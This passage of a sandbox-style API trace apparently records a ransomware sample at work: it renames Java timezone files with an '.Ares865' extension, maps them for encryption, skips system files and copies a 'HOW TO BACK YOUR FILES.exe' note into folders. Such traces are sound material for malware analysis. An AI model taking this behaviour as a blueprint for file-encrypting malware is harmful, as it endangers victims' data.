dwFlags=0x0) returned 1 [0133.412] lstrcpyW (in: lpString1=0x2cce460, lpString2="Pohnpei" | out: lpString1="Pohnpei") returned="Pohnpei" [0133.412] lstrlenW (lpString="Pohnpei") returned 7 [0133.412] lstrlenW (lpString="Ares865") returned 7 [0133.412] lstrlenW (lpString=".dll") returned 4 [0133.412] lstrcmpiW (lpString1="Pohnpei", lpString2=".dll") returned 1 [0133.412] lstrlenW (lpString=".lnk") returned 4 [0133.413] lstrcmpiW (lpString1="Pohnpei", lpString2=".lnk") returned 1 [0133.413] lstrlenW (lpString=".ini") returned 4 [0133.413] lstrcmpiW (lpString1="Pohnpei", lpString2=".ini") returned 1 [0133.413] lstrlenW (lpString=".sys") returned 4 [0133.413] lstrcmpiW (lpString1="Pohnpei", lpString2=".sys") returned 1 [0133.413] lstrlenW (lpString="Pohnpei") returned 7 [0133.413] lstrlenW (lpString="bak") returned 3 [0133.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.Ares865") returned 63 [0133.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei.ares865"), dwFlags=0x1) returned 1 [0133.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.414] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.415] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.415] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.415] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.415] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.417] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.418] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.419] lstrcpyW (in: lpString1=0x2cce460, lpString2="Port_Moresby" | out: lpString1="Port_Moresby") returned="Port_Moresby" [0133.419] lstrlenW (lpString="Port_Moresby") returned 12 [0133.419] lstrlenW (lpString="Ares865") returned 7 [0133.419] lstrcmpiW (lpString1="Moresby", lpString2="Ares865") returned 1 [0133.419] lstrlenW (lpString=".dll") returned 4 [0133.419] lstrcmpiW (lpString1="Port_Moresby", lpString2=".dll") returned 1 [0133.419] lstrlenW (lpString=".lnk") returned 4 [0133.419] lstrcmpiW (lpString1="Port_Moresby", lpString2=".lnk") returned 1 [0133.419] lstrlenW (lpString=".ini") returned 4 [0133.419] lstrcmpiW (lpString1="Port_Moresby", lpString2=".ini") returned 1 [0133.419] lstrlenW (lpString=".sys") returned 4 [0133.419] lstrcmpiW (lpString1="Port_Moresby", lpString2=".sys") returned 1 [0133.419] lstrlenW (lpString="Port_Moresby") returned 12 [0133.419] lstrlenW (lpString="bak") returned 3 [0133.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.Ares865") returned 68 [0133.420] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby.ares865"), dwFlags=0x1) returned 1 [0133.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.421] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.421] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.422] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.424] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.425] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.426] lstrcpyW (in: lpString1=0x2cce460, lpString2="Rarotonga" | out: lpString1="Rarotonga") returned="Rarotonga" [0133.426] lstrlenW (lpString="Rarotonga") returned 9 [0133.426] lstrlenW (lpString="Ares865") returned 7 [0133.426] lstrcmpiW (lpString1="rotonga", lpString2="Ares865") returned 1 [0133.426] lstrlenW (lpString=".dll") returned 4 [0133.426] lstrcmpiW (lpString1="Rarotonga", lpString2=".dll") returned 1 [0133.426] lstrlenW (lpString=".lnk") returned 4 [0133.426] lstrcmpiW (lpString1="Rarotonga", lpString2=".lnk") returned 1 [0133.426] lstrlenW (lpString=".ini") returned 4 [0133.426] lstrcmpiW (lpString1="Rarotonga", lpString2=".ini") returned 1 [0133.426] lstrlenW (lpString=".sys") returned 4 [0133.426] lstrcmpiW (lpString1="Rarotonga", lpString2=".sys") returned 1 [0133.426] lstrlenW (lpString="Rarotonga") returned 9 [0133.426] lstrlenW (lpString="bak") returned 3 [0133.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.Ares865") returned 65 [0133.427] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga.ares865"), dwFlags=0x1) returned 1 [0133.428] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.428] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=285) returned 1 [0133.428] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.429] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.429] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.429] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x170 [0133.431] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0133.432] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.433] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.433] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.433] lstrcpyW (in: lpString1=0x2cce460, lpString2="Saipan.Ares865" | out: lpString1="Saipan.Ares865") returned="Saipan.Ares865" [0133.433] lstrlenW (lpString="Saipan.Ares865") returned 14 [0133.433] lstrlenW (lpString="Ares865") returned 7 [0133.433] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.433] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746ac100, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746ac100, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tahiti", cAlternateFileName="")) returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="aoldtz.exe") returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2=".") returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="..") returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="windows") returned -1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="bootmgr") returned 1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="temp") returned -1 [0133.433] lstrcmpiW (lpString1="Tahiti", lpString2="pagefile.sys") returned 1 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2="boot") returned 1 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2="ids.txt") returned 1 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2="ntuser.dat") returned 1 [0133.434] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tahiti" | out: lpString1="Tahiti") returned="Tahiti" [0133.434] lstrlenW (lpString="Tahiti") returned 6 [0133.434] lstrlenW (lpString="Ares865") returned 7 [0133.434] lstrlenW (lpString=".dll") returned 4 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2=".dll") returned 1 [0133.434] lstrlenW (lpString=".lnk") returned 4 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2=".lnk") returned 1 [0133.434] lstrlenW (lpString=".ini") returned 4 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2=".ini") returned 1 [0133.434] lstrlenW (lpString=".sys") returned 4 [0133.434] lstrcmpiW (lpString1="Tahiti", lpString2=".sys") returned 1 [0133.434] lstrlenW (lpString="Tahiti") returned 6 [0133.434] lstrlenW (lpString="bak") returned 3 [0133.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.Ares865") returned 62 [0133.434] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti.ares865"), dwFlags=0x1) returned 1 [0133.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.437] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.437] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.439] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.440] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.440] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.441] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tarawa" | out: lpString1="Tarawa") returned="Tarawa" [0133.441] lstrlenW (lpString="Tarawa") returned 6 [0133.441] lstrlenW (lpString="Ares865") returned 7 [0133.441] lstrlenW (lpString=".dll") returned 4 [0133.441] lstrcmpiW (lpString1="Tarawa", lpString2=".dll") returned 1 [0133.441] lstrlenW (lpString=".lnk") returned 4 [0133.441] lstrcmpiW (lpString1="Tarawa", lpString2=".lnk") returned 1 [0133.441] lstrlenW (lpString=".ini") returned 4 [0133.441] lstrcmpiW (lpString1="Tarawa", lpString2=".ini") returned 1 [0133.441] lstrlenW (lpString=".sys") returned 4 [0133.441] lstrcmpiW (lpString1="Tarawa", lpString2=".sys") returned 1 [0133.441] lstrlenW (lpString="Tarawa") returned 6 [0133.441] lstrlenW (lpString="bak") returned 3 [0133.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.Ares865") returned 62 [0133.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa.ares865"), dwFlags=0x1) returned 1 [0133.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.443] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.443] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.444] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.444] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.444] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.446] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.447] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.447] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.447] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.448] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tongatapu" | out: lpString1="Tongatapu") returned="Tongatapu" [0133.448] lstrlenW (lpString="Tongatapu") returned 9 [0133.448] lstrlenW (lpString="Ares865") returned 7 [0133.448] lstrcmpiW (lpString1="ngatapu", lpString2="Ares865") returned 1 [0133.448] lstrlenW (lpString=".dll") returned 4 [0133.448] lstrcmpiW (lpString1="Tongatapu", lpString2=".dll") returned 1 [0133.448] lstrlenW (lpString=".lnk") returned 4 [0133.448] lstrcmpiW (lpString1="Tongatapu", lpString2=".lnk") returned 1 [0133.448] lstrlenW (lpString=".ini") returned 4 [0133.448] lstrcmpiW (lpString1="Tongatapu", lpString2=".ini") returned 1 [0133.448] lstrlenW (lpString=".sys") returned 4 [0133.448] lstrcmpiW (lpString1="Tongatapu", lpString2=".sys") returned 1 [0133.448] lstrlenW (lpString="Tongatapu") returned 9 [0133.448] lstrlenW (lpString="bak") returned 3 [0133.449] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.Ares865") returned 65 [0133.449] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu.ares865"), dwFlags=0x1) returned 1 [0133.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0133.450] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.451] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.451] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.451] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x170 [0133.453] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0133.454] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.455] lstrcpyW (in: lpString1=0x2cce460, lpString2="Wake" | out: lpString1="Wake") returned="Wake" [0133.455] lstrlenW (lpString="Wake") returned 4 [0133.455] lstrlenW (lpString="Ares865") returned 7 [0133.455] lstrlenW (lpString=".dll") returned 4 [0133.455] lstrlenW (lpString=".lnk") returned 4 [0133.455] lstrlenW (lpString=".ini") returned 4 [0133.455] lstrlenW (lpString=".sys") returned 4 [0133.455] lstrlenW (lpString="Wake") returned 4 [0133.455] lstrlenW (lpString="bak") returned 3 [0133.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.Ares865") returned 60 [0133.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake.ares865"), dwFlags=0x1) returned 1 [0133.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.458] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.459] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.461] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.463] lstrcpyW (in: lpString1=0x2cce460, lpString2="Wallis" | out: lpString1="Wallis") returned="Wallis" [0133.463] lstrlenW (lpString="Wallis") returned 6 [0133.463] lstrlenW (lpString="Ares865") returned 7 [0133.463] lstrlenW (lpString=".dll") returned 4 [0133.463] lstrcmpiW (lpString1="Wallis", lpString2=".dll") returned 1 [0133.463] lstrlenW (lpString=".lnk") returned 4 [0133.463] lstrcmpiW (lpString1="Wallis", lpString2=".lnk") returned 1 [0133.463] lstrlenW (lpString=".ini") returned 4 [0133.463] lstrcmpiW (lpString1="Wallis", lpString2=".ini") returned 1 [0133.463] lstrlenW (lpString=".sys") returned 4 [0133.463] lstrcmpiW (lpString1="Wallis", lpString2=".sys") returned 1 [0133.463] lstrlenW (lpString="Wallis") returned 6 [0133.463] lstrlenW (lpString="bak") returned 3 [0133.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.Ares865") returned 62 [0133.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis.ares865"), dwFlags=0x1) returned 1 [0133.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.465] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.470] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian" [0133.471] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian" [0133.471] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0133.471] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\how to back your files.exe"), bFailIfExists=1) returned 0 [0133.472] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0133.472] GetLastError () returned 0x0 [0133.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0133.472] FindFirstFileW (in: 